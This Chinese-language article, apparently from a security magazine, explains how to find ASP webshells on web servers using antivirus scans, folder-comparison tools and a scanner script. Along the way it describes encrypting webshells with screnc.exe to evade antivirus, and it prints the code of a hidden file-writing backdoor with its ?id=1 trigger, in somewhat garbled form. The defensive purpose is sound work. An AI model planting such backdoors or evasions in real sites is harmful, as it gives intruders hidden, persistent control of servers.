一技巧1 杀毒软件查杀
一些朋友可能在成功得到上传权限之后上传的asp木马是一些非常有名的asp木马例如 cmdasp海洋顶端木马这些木马虽然功能强大但是早已经被杀毒软件列入了黑名单所以利用杀毒软件对web空间中的文件进行扫描可以有效的发现并清除这些有名的asp木马。这是我利用瑞星杀毒软件在web目录中查杀到的一个asp木马木马标注为Script.ASP.Rootkit.10.a在瑞星的网站上搜索一下可以知道这就是海洋顶端木马。利用这种方法可以有效的对抗一些小菜上传的asp木马效果明显。
二技巧2 FT P客户端对比
上面的方法虽然对菜鸟入侵者比较管用但是遇到稍微有点意识的入侵者来说几乎失去效果 因为他们完全可以对asp木马进行伪装加密使其躲藏杀毒软件这样的手法比较多我个人比较喜欢微软开发个的一个asp加密小工具 screnc.exe screnc.exe是一款AS P加密程序加密的程式比较安全使代码完全改变使用也非常简单。只需要在命令下输入screnc.exe得到帮助命令 Usage:screnc[/?] [/s] [/f] [/xl] [/l ScriptLanguage] [/eDefaultExtension] 〈source〉 〈destination〉 根据提示只需要输入 screnc.exe要加密的asp木马名输出的asp木马名就可以完成加密伪装。
经过加密之后记事本打开查看可以看到标签 〈%……%〉 〈script〉 〈/script〉等标签内的代码成为一些“乱码”而杀毒软件查杀asp木马是通过搜索关键字来查杀着阿姨能够显然就躲过查杀。
盛大官方网站被黑挂的网页木马代码就是利用screnc.exe来加密的过了好几天才被发现可见加密伪装手法的高超。
所以要采取另外的措施对付这种加密伪装的asp木马我们可以利用一些FTP客户端软件例如cuteftp FlashFXP提供的文件对比功能通过对比FTP的中的web文件和本地的备份文件发现是否错出可疑文件。
这里以FlashFXP进行操作讲解。
步骤1 打开FlashFXP在左边窗口中跳转到本地web备份文件目录在右边的FTP窗口中跳转到web目录下。
步骤2 点工具栏中的“工具”选择其中的“比较文件夹命令” 即可进行对比文件夹速度非常快。
我们可以清楚的看到196个对象被过滤在FTP空间中多出了这样几个asp文件 .asp
2005.asp等这十有八九就是入侵者留下的asp后门打开确认一下即可。
三技巧3用Beyond Compare 2进行对比
上面的利用FTP客户端对比文件的方法虽然有效但是遇到渗透入文件的asp木马那就无能为力了这里介绍一款渗透性asp木马可以将代码插入到指定web文件中平常情况下不会显示只有使用触发语句才能打开asp木马其隐蔽性非常高。代码如下
〈%on error resume nextid=request("id")if request("id")=1 thentestfi le=Request.form("name")msg=Request.form("message")set fs=server.CreatObject("scripting.fi lesystemobject")set thisfi le=fs.openTestFi le(testfi le,8,True,0)thisfi le.Writel ine(""&msg&"")thisfi le.closeset fs=nothing
%〉
〈from method="post"Action="保存"?id=1 〉
〈input type="text"size="20"name="Name"
Value= 〈%=server.mappath("XP.ASP")%〉 〉
〈textarea name="Message"class=input〉
〈/textarea〉
〈input type="Submit"name="send"Value="生成"class=input〉
〈/from〉
〈%end if%〉
注意在修改目标主机的web文件时要注意这样的文件修改后没有效果 即含有类似于
〈!--#include fi le="inc/conn.asp"--〉这样的文件包含命令这样的代码存在时加入asp代码后根本不会显示出脚本后门但是脚本后门代码不会影响原文件的显示和功能。假如已经对目标服务器www.target.com下的一个editor_InsertPic.asp文件进行了修改插入了脚本后门代码那么打开的方式是 www. target. .com/editor_InsertPic.asp?id=1 ,注意后门的字符?id=1 有了这些字符才能保证脚本后门显示出来普通情况下打开www. target. .com/editor_InsertPic.asp?id=1 是不会露出破绽的。
这招真是asp木马放置中非常狠的如果遇到这样的情况该怎么办我们可以利用一款专业的文件对比工具Beyond Compare2来完成木马的查找。
Beyond Compare 2一款不可多得的专业级的文件夹和文件对比工具。使用它可以很方便的对比出两个文件夹或者文件的不同之处。并把相差的每一个字节用颜色加以表示查看方便。并且支持多种规则对比。
看我来利用它完成渗透性asp木马的查找。
步骤1 打开Beyond Compare 2 点工具栏中的“比较任务”选择其中的选项新建在“比较模式”中选择“比较两个文件夹”。进入一下步选择需要对比的两个文件夹路径 即备份过的网站文件以及从FTP上下载的网站文件再在下面的“文件过滤器”中选择“包括所有文件”。在“比较范围”中选择“文件大小”。设置完毕即可开始比较。
步骤2 比较完毕软件界面左右两边分别显示了比较的结果从中可以很容易找到哪个目录多出了什么文件。
步骤3文件名相同但是大小不同的文件会被软件用另外的颜色标注出来选择上它们然后选择工具栏的“操作”中的“比较内容”功能 即可展开两个文件的详细内容从中我们可以看到FTP端的文件被插入了渗透asp木马。这下很容易找到了吧
四技巧4利用组件性能找asp木马
上面分门别类的介绍了几种asp木马的放置与查杀技巧一般的菜鸟老鸟恐怕都是利用上面的方法来放置asp木马吧所以可以有效的对抗web空间中上传的asp木马。这下可以高枕无忧了吧呵呵先别急还有一种BT的asp木马放置方法你可能很难想到放置思路是这样的在目标web空间中寻找一个不常用的 比较合适的asp文件打开它对其进行代码精简然后再将渗透asp木马的代码插入再对其进行精简直至与原本的文件大小一样。最后利用加密伪装的手法对其进行处理。这样就彻底练就了一个绝对隐藏的asp木马后门一般的入侵者恐怕很难做到这一点 因为要精简代码的同时还要保证asp木马的功能不会错误。
如果你恰恰遇到一个这样的入侵者那么该怎么才能查出被他放置的asp木马呢你可能认为这已经不太可能了呵呵完全可能看我拿出宝贝来思易asp木马追捕。它是一款专门检索各种asp文件所带功能的asp软件通过搜索asp木马含有的特殊字符以及搜索利用变量创建对象及静态对象建立的代码来找出可能含有疑点的asp文件从而有效的防范asp木马。
使用非常简单只需要将文件aspl ist2.0.asp上传到web空间下然后在地址拦中打开就完成了所有asp文件的检索。可以看出它是通过查找各个asp文件的功能来确认是否为asp木马这些功能也都是asp木马常用的 FSOWS SHELL XML等等。
一般的web文件很少具有这样的功能只有那些可恶的asp木马才具有可以看到一些文件具备了相当多的功能这时候就可以打开这些文件来确认是否是asp木马非常有效。大家在查找web空间的asp木马时最好几种方法结合起来这样就能有效的查杀被隐藏起来的asp木马。
